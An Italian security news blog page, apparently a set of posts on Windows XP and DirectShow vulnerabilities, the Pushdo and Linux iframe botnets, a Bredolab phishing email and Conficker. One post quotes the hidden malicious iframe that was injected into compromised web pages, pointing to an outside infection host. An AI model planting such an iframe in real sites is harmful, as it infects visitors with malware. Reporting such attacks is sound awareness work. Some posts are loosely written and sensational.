Exploits
Non Premete F1 in un computer con Windows Xp se usate Internet Explorer
il ricercatore polacco Maurycy Prodeus, analista di iSEC Security Research, ha scoperto un interessante falla che può consentire ad un malintezionato di sfruttare una vulnerabilità presente nel sistema della guida in linea di windows. La vulnerabilità verrebbe azionata dalla semplice pressione del tasto F1. il sistema operativo affetto da questa problematica è windows Xp Sp3. Il meccanismo è semplice è basato su file VBScript che interagiscono con i file della guida che vengono lanciati attraverso internet explorer.
In pratica si fa caricare un file della guida da remoto per consentire all’aggressore di generare un overflow dell’applicazione winhlp32 per eseguire codice arbitrario con i diritti dell’utente corrente.
Si consiglia vivamente di bloccare l’accesso alla porta 445.
Le versioni interessate sono sia IE 6, IE7 che IE8.
i computer con installato Windows Vista, Windows 7, Windows Server 2008 e Windows Server 2008 R2 non sono affetti da questa problematica e a dire il vero se si usa un browser alternativo tipo mozilla firefox non si dovrebbe incappare in questo bug.
attenzione : Vulnerabilita’ in Microsoft DirectShow, apri il video e sei fritto….
attenzione : Vulnerabilita’ in Microsoft DirectShow
****************************************************************** :: Descrizione del problema
Microsoft ha rilasciato un aggiornamento per risolvere una vulnerabilita’ di tipo heap overflow presente in Microsoft DirectShow.
La vulnerabilita’ potrebbe consentire l’esecuzione remota di codice arbitrario se l’utente apre un file AVI artefatto, anche durante la navigazione sul web.
Software interessato
Windows 2000 SP4
Windows XP SP2
Windows XP SP3
Windows XP Pro x64 Edition SP2
Windows Vista Windows Vista SP1
Windows Vista SP2
Windows Vista x64 Edition
Windows Vista x64 Edition SP1
Windows Vista x64 Edition SP2 Windows 7 (32-bit) Windows 7 (x64)
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Server 2003 SP2 (Itanium)
Windows Server 2008 (32-bit)
Windows Server 2008 (32-bit) SP2
Windows Server 2008 (x64)
Windows Server 2008 (x64) SP2
Windows Server 2008 (Itanium)
Windows Server 2008 (Itanium) SP2
Windows Server 2008 R2 (x64)
Windows Server 2008 R2 (Itanium)
Impatto :
Esecuzione remota di codice arbitrario
Conquista del controllo sul sistema
:: Soluzioni
Installare manualmente la patch elencata nel bollettino Microsoft, oppure utilizzare uno degli strumenti di aggiornamento come: Aggiornamenti Automatici, Windows Update, Microsoft Update, Windows Server Update Services, Systems Management Server.
:: Riferimenti
Microsoft Security Bulletin http://www.microsoft.com/technet/security/Bulletin/MS10-013.mspx
Microsoft Knowledge Base
http://support.microsoft.com/kb/977935
Microsoft Update e Aggiornamenti Automatici
http://go.microsoft.com/fwlink/?LinkID=40747
https://www.update.microsoft.com/microsoftupdate/v6/ http://support.microsoft.com/kb/306525/
TippingPoint Zero Day Initiative
http://www.zerodayinitiative.com/advisories/ZDI-10-015/
Mitre’s CVE ID http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0250 Vupen Security http://www.vupen.com/english/advisories/2010/0346
ISC SANS http://isc.sans.org/diary.html?storyid=8197
la saturazione della banda secondo Pushdo…
Internet è una risorsa comune, dove è facile
incontrare colossi che cercano di accaparrarsi
range di ip, fette di mercato e connettività…
Per un altro verso c’è gente che studia come
farci crollare quelle poche certezze che
ci siamo costruiti.
Oggi vi presento la botnet Pushdoo una botnet
rete di computer inteconnessi che tramite sofisticate tecniche di
interconnessione è in grado di sovraccaricare e mettere in ginocchio
network della portata di Paypal e Cia,l’attacco
appare molto semplice ci sono migliaia di richieste tramite protocollo
ssl, connessione sicura, quindi esigente in termini di risorse a network
veramente estesi e la cosa singolare e che nel medesimo momento migliaia
di ip collegati da tutto il mondo sovraccaricano provocando
una saturazione della banda con un conseguente rallentamento o peggio
blocco si servizi importanti come Paypal…
Detto questo: visto che secondo la teoria economica le risorse sono scarse, visto
che gli indirizzi ipv4 sono “finiti” che dire…
Mi rimetto a voi maghi del web, sapientoni
del mondo informatico, Chief security manager, multinazionali e colossi
pronti a fregare linfa creativa a noi poveri privi di disponibilità e risorse tecnologiche
vediamo cosa siete in grado di fare di fronte a questa nuova minaccia che se perfezionata
potrebbe poratere all’implosione di una struttura ormai vecchia !!! e bisognosa di nuove regole
e accorgimenti per una connettività razionale ed efficiente.
facebook e il trojan “Bredolab”
attenzione Pericolo per gli utenti di facebook !
se ricevete una mail con oggetto “Password Reset Confirmation Email”
da l’indirizzo apparente service@facebook.com magari con scritto The Facebook Team siete vittime di una tragica presa in giro.
a peggiorare la situazione intervengono alcuni fantomatici esperti che faendosi trascinare dal fatto che questa email sembra vera assicurano che è genuina e tutti potete cliccare su questi messaggi senza incorrere in nessuna minuccia.
Poi si continua nel tam tam che sta investendo la rete si sostiene in diversi siti che solo una decina di software antivirus sono in grado di scovare questo trojan contenuto nel corpo del messaggio perchè solo dopo si capisce leggendo pagine e pagine che c’è qualcosa che non va in questi messaggi misteriosi alcuni in italiano alcuni in inglese che stanno arrivando agli utenti registrati su facebook.
In poche parole è una e-mail che serve per carpire dati sensibili dai vostri account, e accedere al vostro computer il worm Bredolab incluso nel messaggio che viene spacciato per vero diche che per la sicurezza dei propri iscritti è necessario sostituire utente e password per l’accesso alla piattaforma facebook, ma qui sta la furbata la password da inserire la suggerisce chi ha scritto la mail spacciandosi per il team di facebook.
In poche parole basta che l’utente medio voglia a suo modo approfondire la faccenda e si appresta a cliccare il virus worm entra in azione trasformando il pc in una spazzatura che patcha i file “svchost.exe” ed “explorer.exe” e facendo tale operazione a volte vengono elusi molti software antivirus che pur restando attivi, non fanno il proprio lavoro es. di norma il firewall legittima il traffico per tali processi considerati parte essenziale del sistema.
Una volta che i software antivirus e i relativi firewall vengono “rincitrulliti” il malware inizia a scaricare altro codice maligno che fa diventare il pc dell’utente una macchina zombie al servizio di terzi.
Un consiglio analizzate sempre le e-mail che vi arrivano, cercate di scoprire quale server è stato utilizzato prima di ridurre il vostro pc in una specie di vecchio soprammobile o a vostra scelta in una lavabiancheria rotta .
consigli
1) eliminare il messaggio
2) non aprire nessun allegato da sconosciuti
3) non cedere credenziali a terzi e poi gridare al lupo al lupo…
4)lavatevi la faccia prima di mettervi davanti al pc
Nuovo attacco ai server web Linux, botnet via iframe apache e nginx
Denis Sinegubko, si occupa di sicurezza in Russia, ha scoperto un gruppo di circa 100 server Linux infetti (una botnet) interconnessi tra loro. Si tratta di un gruppo di server web infetti e connessi tra loro che diffondono malware, con lo scopo di creare una rete di computer (server web) che infettano i visitatori di siti web, questa attività è stata scoperta analizzando alcuni server con installato apache con password di root facili, combinando mediante la tecnica iframe server esterni con installato il server nginx si è potuto inserire con successo nelle pagine stringhe all’interno del server vittima fatte in questa maniera :
<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
Tale tecnica non fa altro che aumentare le macchine zombie.
Cosa avviene in parole semplici :
i server infetti osservati da Sinegubko legittimano il traffico web sulla porta 80,
la porta standard tcp per le connessioni al server. Il server rogue che gira avendo installato nginx potente server http e un mail proxy server sviluppato in russia da Igor Sysoev fa in modo che i computer degli utenti vengano infettati.
A complicare le cose e per aumentare la potenza virale ci si è messo pure l’aggiunta di reti basate su servizi che permettono la rintracciabilità di un computer in rete, ciò significa che esiste una rete di server tracciabile e una rete di computer che potenzialmente non avendo hosting fisso possono cambiare rapidamente dislocazione geografica.
Il tutto significa che nel momento in cui si lancia un comando alla botnet tutti i server infetti rispondono.
Secondo Sinegubko la responsabilità di tale diffusione è tutta degli amministratori di rete che mettono password poco sicure o che non proteggono il traffico di rete da eventuali sniffaggi di password di root.
ATTENZIONE PERICOLOSISSIMO VIRUS CONOSCIUTO COME:Conficker, Downadup e Fido
ATTENZIONE VIRUS PERICOLOSISSIMO !! MASSIMA ALLERTA!!
SI PREGA DI FARE MOLTA ATTENZIONE sta circolando un virus di nuova concezione, questa
creatura è conociuta con il nome “Conficker”, “Downadup” e “Fido” le particolarità di questo virus worm sono molteplici la notizia è stata diffusa dalla BBC NEWS, non è una bufala e non sto scherzando.
MASSIMA ALLERTA AGGIORNARE SUBITO ANTIVIRUS E PATCHARE IL PROPRIO SISTEMA OPERATIVO WINDOWS SI CONSIGLIA caldamente DI APPLICARE LA PATCH MS08-067 (riferimento in fondo all’articolo) o meglio aggiornare i propri sistemi con windows update.
Tale falla consente ai creatori del virus (gente particolarmente abile e preparata) di trasformare il proprio pc non aggiornato in uno zombie e scaricare file e quant’altro gli interessa in server esterni che fanno parte di una rete di computer definita botnet, si dice che i pc appartengano a classi diverse dunque irrintracciabili, e che sia prevista la possibilità di registrare in automatico nuovi spazi.
L’infezione avviene anche sfuttando una falla nella funzione autorun (auto avvio, quando si inserisce un supporto tipo pen drivem cd ed altro infetto), in parole semplici basta inserire qualcosa e il pc si infetta il virus agisce sfruttando una vecchia falla di windows per altro già segnalata nel mese di ottobre alla microsoft, i creatori di questo virus particolarmente intelligente riescono ad impadronirsi del proprio pc per fargli eseguire determinate operazioni a nostra insaputa.
Gli esperti della casa antivirus F-secure confermano che la diffusione del virus sta assumendo dimensioni rilevanti, c’è chi parla di 9 milioni di computer infettati.
I ricercatori della Kaspersky Lab (antivirus russo particolarmente noto per la capacità di individuare mutazioni virali nel codice di tipo shealth) affermano che nelle ultime due settimane il codice maligno del virus sta mutando rapidamente dotandosi di nuove pericolose funzioni, Silvio Passalacqua di www.haox.it consiglia quindi di aggiornare le proprie basi antivirus e di controllare che l’antivirus stesso non sia infetto ed eseguire immediatamete l’aggiornamento del prorprio sistema operativo con windows update.
Articoli e riferimenti esterni (vi assicuro che non è una balla) :
- repubblica si è occupato del caso questa traduzione di Fabio Galimberti all’articolo di John Markoff nel New York Times John Markoff è un giornalista e scrittore statunitense specializzato in Informatica. Da anni è la prima firma del New York Times in questo settore. Insieme a Tsutomu Shimomura, contribuì all’arresto del famoso hacker Kevin Mitnick il 15 febbraio 1995.
- articolo dettagliato su repubblica (articolo di Vittorio Zambardino - Parla Alberto Berretti,matematico e docente di sicurezza informatica all’Università Roma “)
SILVIO PASSALACQUA DI WWW.HOAX.IT CONSIGLIA :
